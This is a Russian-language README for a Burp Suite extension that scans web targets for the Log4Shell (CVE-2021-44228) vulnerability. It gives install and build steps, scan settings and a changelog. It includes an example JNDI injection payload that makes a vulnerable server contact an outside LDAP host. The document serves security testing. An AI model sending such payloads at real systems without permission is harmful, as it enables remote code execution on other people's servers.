Расширение Burp для сканирования уязвимости Log4Shell (CVE-2021-44228) с помощью пользовательских полезных нагрузок.
Отказ от ответственности
Я не несу ответственности за ваши действия, зависание Burp Suite, взлом вашей цели, термоядерную войну или текущий экономический кризис, вызванные вашим следованием этим инструкциям. ВЫ сами решаете использовать этот инструмент, и если вы укажете на меня пальцем за какие-либо проблемы, я буду LMAO над вами.

Инструкции:
- Установите расширение либо из предварительно скомпилированных релизов, либо соберите из исходного кода.
- Отключите/снимите все остальные активные расширения для сканирования, такие как active scan++, burp bounty pro, param-miner и т.д.
- В верхнем меню откройте настройки Log4J Scanner.
- Добавьте вашу пользовательскую полезную нагрузку и сохраните настройки.
- Выберите вашу цель > правая кнопка мыши > Scan.
- Выберите
Scan Configuration > Select from library
- Выберите только
Audit checks - extensions only и нажмите кнопку OK.
Особая благодарность Silent Signal, инструкции и конфигурации сканирования вдохновлены его расширением.
Важные инструкции, которые нужно запомнить:
- В вашу пользовательскую полезную нагрузку НЕ добавляйте URL коллаборатора, просто добавьте
[collaborator-server] в качестве заполнителя,
[collaborator-server будет заменён на URL вашего сервера-коллаборатора.
- Пример полезной нагрузки:
"${jndi:ldap://[collaborator-server]/a}
Загрузка релизов
https://github.com/0xDexter0us/Log4J-Scanner/releases/
Сборка из исходного кода
./gradlew build fatJar
- Grab the jar file
build/libs/Log4J-Scanner-x.x.x.jar
Установка
- Скачайте последний jar из релизов или соберите из исходного кода.
- Добавьте jar в Burp Suite.
Если вам нравится проект, поставьте репозиторию звезду! <3
Ресурсы
- Для пассивного сканирования:
https://github.com/f0ng/log4j2burpscanner
- Для активного сканирования:
https://github.com/albinowax/ActiveScanPlusPlus & https://github.com/silentsignal/burp-log4shell
Журнал изменений
25 декабря 2021 - v0.2.0
- Добавлен API Burp Collaborator.
- Удалён пользовательский сканер.
- Добавлен API Burp Scanner.
13 декабря 2021 - v0.1.0
Благодарности
Этот код был написан мной за один день и является первоначальным релизом, возможны ошибки, приветствуются сообщения об ошибках, предложения и pull requests :)

